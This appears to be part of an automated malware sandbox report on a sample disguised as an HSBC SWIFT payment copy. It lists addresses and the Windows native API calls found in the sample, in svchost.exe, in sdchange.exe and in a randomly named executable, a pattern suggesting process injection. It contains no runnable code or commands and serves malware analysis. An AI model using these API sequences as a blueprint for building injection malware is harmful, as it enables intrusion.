Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972F60 NtCreateProcessEx,	2_2_03972F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972E80 NtReadVirtualMemory,	2_2_03972E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972EA0 NtAdjustPrivilegesToken,	2_2_03972EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972EE0 NtQueueApcThread,	2_2_03972EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972E30 NtWriteVirtualMemory,	2_2_03972E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972DB0 NtEnumerateKey,	2_2_03972DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972DD0 NtDelayExecution,	2_2_03972DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972D10 NtMapViewOfSection,	2_2_03972D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972D00 NtSetInformationFile,	2_2_03972D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972D30 NtUnmapViewOfSection,	2_2_03972D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972CA0 NtQueryInformationToken,	2_2_03972CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972CC0 NtQueryVirtualMemory,	2_2_03972CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972CF0 NtOpenProcess,	2_2_03972CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972C00 NtQueryInformationProcess,	2_2_03972C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972C70 NtFreeVirtualMemory,	2_2_03972C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972C60 NtCreateKey,	2_2_03972C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03973090 NtSetValueKey,	2_2_03973090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03973010 NtOpenDirectoryObject,	2_2_03973010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039739B0 NtGetContextThread,	2_2_039739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03973D10 NtOpenProcessToken,	2_2_03973D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03973D70 NtOpenThread,	2_2_03973D70
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D74650 NtSuspendThread,LdrInitializeThunk,	5_2_04D74650
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D74340 NtSetContextThread,LdrInitializeThunk,	5_2_04D74340
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_04D72CA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_04D72C70
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72C60 NtCreateKey,LdrInitializeThunk,	5_2_04D72C60
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72DD0 NtDelayExecution,LdrInitializeThunk,	5_2_04D72DD0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_04D72DF0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_04D72D10
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_04D72D30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_04D72EE0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_04D72E80
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72FE0 NtCreateFile,LdrInitializeThunk,	5_2_04D72FE0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72FB0 NtResumeThread,LdrInitializeThunk,	5_2_04D72FB0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72F30 NtCreateSection,LdrInitializeThunk,	5_2_04D72F30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72AD0 NtReadFile,LdrInitializeThunk,	5_2_04D72AD0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72AF0 NtWriteFile,LdrInitializeThunk,	5_2_04D72AF0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_04D72BF0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_04D72BE0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_04D72BA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72B60 NtClose,LdrInitializeThunk,	5_2_04D72B60
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D735C0 NtCreateMutant,LdrInitializeThunk,	5_2_04D735C0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D739B0 NtGetContextThread,LdrInitializeThunk,	5_2_04D739B0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72CC0 NtQueryVirtualMemory,	5_2_04D72CC0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72CF0 NtOpenProcess,	5_2_04D72CF0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72C00 NtQueryInformationProcess,	5_2_04D72C00
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72DB0 NtEnumerateKey,	5_2_04D72DB0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72D00 NtSetInformationFile,	5_2_04D72D00
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72EA0 NtAdjustPrivilegesToken,	5_2_04D72EA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72E30 NtWriteVirtualMemory,	5_2_04D72E30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72F90 NtProtectVirtualMemory,	5_2_04D72F90
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72FA0 NtQuerySection,	5_2_04D72FA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72F60 NtCreateProcessEx,	5_2_04D72F60
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72AB0 NtWaitForSingleObject,	5_2_04D72AB0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D72B80 NtQueryInformationFile,	5_2_04D72B80
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D73090 NtSetValueKey,	5_2_04D73090
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D73010 NtOpenDirectoryObject,	5_2_04D73010
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D73D70 NtOpenThread,	5_2_04D73D70
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D73D10 NtOpenProcessToken,	5_2_04D73D10
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E28AC0 NtCreateFile,	5_2_02E28AC0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E28F30 NtAllocateVirtualMemory,	5_2_02E28F30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E28C30 NtReadFile,	5_2_02E28C30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E28DD0 NtClose,	5_2_02E28DD0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E28D20 NtDeleteFile,	5_2_02E28D20

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_0078A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0078A1EF

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00778310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00778310

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_007851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_007851BD

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0072E6A0	0_2_0072E6A0
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0074D975	0_2_0074D975
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007421C5	0_2_007421C5
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007562D2	0_2_007562D2
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007A03DA	0_2_007A03DA
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0075242E	0_2_0075242E
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007425FA	0_2_007425FA
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0077E616	0_2_0077E616
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007366E1	0_2_007366E1
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0075878F	0_2_0075878F
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007A0857	0_2_007A0857
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00756844	0_2_00756844
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00738808	0_2_00738808
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00788889	0_2_00788889
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0074CB21	0_2_0074CB21
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00756DB6	0_2_00756DB6
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00736F9E	0_2_00736F9E
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00733030	0_2_00733030
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0074F1D9	0_2_0074F1D9
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00743187	0_2_00743187
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00721287	0_2_00721287
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00741484	0_2_00741484
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00735520	0_2_00735520
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00747696	0_2_00747696
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00735760	0_2_00735760
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00741978	0_2_00741978
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00759AB5	0_2_00759AB5
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0072FCE0	0_2_0072FCE0
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007A7DDB	0_2_007A7DDB
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0074BDA6	0_2_0074BDA6
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00741D90	0_2_00741D90
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0072DF00	0_2_0072DF00
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00733FE0	0_2_00733FE0
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_01F83600	0_2_01F83600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004011E0	2_2_004011E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418223	2_2_00418223
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401000	2_2_00401000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004030D0	2_2_004030D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401A25	2_2_00401A25
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401A30	2_2_00401A30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FAC3	2_2_0040FAC3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FABA	2_2_0040FABA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004023C3	2_2_004023C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402BD0	2_2_00402BD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004023D0	2_2_004023D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004163BC	2_2_004163BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416403	2_2_00416403
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FCE3	2_2_0040FCE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DD63	2_2_0040DD63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DD07	2_2_0040DD07
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004027E0	2_2_004027E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042E793	2_2_0042E793
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A003E6	2_2_03A003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E3F0	2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FA352	2_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C02C0	2_2_039C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A001AA	2_2_03A001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F41A2	2_2_039F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F81CC	2_2_039F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DA118	2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930100	2_2_03930100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C8158	2_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393C7C0	2_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03964750	2_2_03964750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395C6E0	2_2_0395C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A00591	2_2_03A00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EE4F6	2_2_039EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E4420	2_2_039E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F2446	2_2_039F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F6BD7	2_2_039F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FAB40	2_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0A9A6	2_2_03A0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03956962	2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039268B8	2_2_039268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E8F0	2_2_0396E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394A840	2_2_0394A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03942840	2_2_03942840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BEFA0	2_2_039BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03932FC8	2_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394CFE0	2_2_0394CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03960F30	2_2_03960F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E2F30	2_2_039E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03982F28	2_2_03982F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B4F40	2_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03952E90	2_2_03952E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FCE93	2_2_039FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FEEDB	2_2_039FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393AE0D	2_2_0393AE0D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FEE26	2_2_039FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940E59	2_2_03940E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03958DBF	2_2_03958DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DCD1F	2_2_039DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394AD00	2_2_0394AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0CB5	2_2_039E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930CF2	2_2_03930CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940C00	2_2_03940C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0398739A	2_2_0398739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F132D	2_2_039F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392D34C	2_2_0392D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039452A0	2_2_039452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395B2C0	2_2_0395B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E12ED	2_2_039E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394B1B0	2_2_0394B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0B16B	2_2_03A0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392F172	2_2_0392F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0397516C	2_2_0397516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EF0CC	2_2_039EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039470C0	2_2_039470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F70E9	2_2_039F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FF0E0	2_2_039FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FF7B0	2_2_039FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F16CC	2_2_039F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03985630	2_2_03985630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DD5B0	2_2_039DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A095C3	2_2_03A095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F7571	2_2_039F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FF43F	2_2_039FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03931460	2_2_03931460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395FB80	2_2_0395FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B5BF0	2_2_039B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0397DBF9	2_2_0397DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FFB76	2_2_039FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DDAAC	2_2_039DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03985AA0	2_2_03985AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E1AA3	2_2_039E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EDAC6	2_2_039EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FFA49	2_2_039FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F7A46	2_2_039F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B3A6C	2_2_039B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D5910	2_2_039D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03949950	2_2_03949950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395B950	2_2_0395B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039438E0	2_2_039438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AD800	2_2_039AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03941F92	2_2_03941F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FFFB1	2_2_039FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03903FD2	2_2_03903FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03903FD5	2_2_03903FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FFF09	2_2_039FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03949EB0	2_2_03949EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395FDC0	2_2_0395FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F1D5A	2_2_039F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03943D40	2_2_03943D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F7D73	2_2_039F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FFCF2	2_2_039FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B9C32	2_2_039B9C32
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_026718F3	4_2_026718F3
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_026718AC	4_2_026718AC
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_0266B1D3	4_2_0266B1D3
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_026736DB	4_2_026736DB
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_0266AFAA	4_2_0266AFAA
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_0266AFB3	4_2_0266AFB3
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_02689C83	4_2_02689C83
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DEE4F6	5_2_04DEE4F6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DF2446	5_2_04DF2446
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DE4420	5_2_04DE4420
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04E00591	5_2_04E00591
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D40535	5_2_04D40535
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D5C6E0	5_2_04D5C6E0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D3C7C0	5_2_04D3C7C0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D64750	5_2_04D64750
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D40770	5_2_04D40770
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DD2000	5_2_04DD2000
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DF81CC	5_2_04DF81CC
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04E001AA	5_2_04E001AA
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DF41A2	5_2_04DF41A2
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DC8158	5_2_04DC8158
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DDA118	5_2_04DDA118
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D30100	5_2_04D30100
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DC02C0	5_2_04DC02C0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DE0274	5_2_04DE0274
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04E003E6	5_2_04E003E6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D4E3F0	5_2_04D4E3F0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFA352	5_2_04DFA352
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D30CF2	5_2_04D30CF2
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DE0CB5	5_2_04DE0CB5
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D40C00	5_2_04D40C00
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D3ADE0	5_2_04D3ADE0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D58DBF	5_2_04D58DBF
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DDCD1F	5_2_04DDCD1F
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D4AD00	5_2_04D4AD00
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFEEDB	5_2_04DFEEDB
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D52E90	5_2_04D52E90
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFCE93	5_2_04DFCE93
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D40E59	5_2_04D40E59
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFEE26	5_2_04DFEE26
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D32FC8	5_2_04D32FC8
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D4CFE0	5_2_04D4CFE0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DBEFA0	5_2_04DBEFA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DB4F40	5_2_04DB4F40
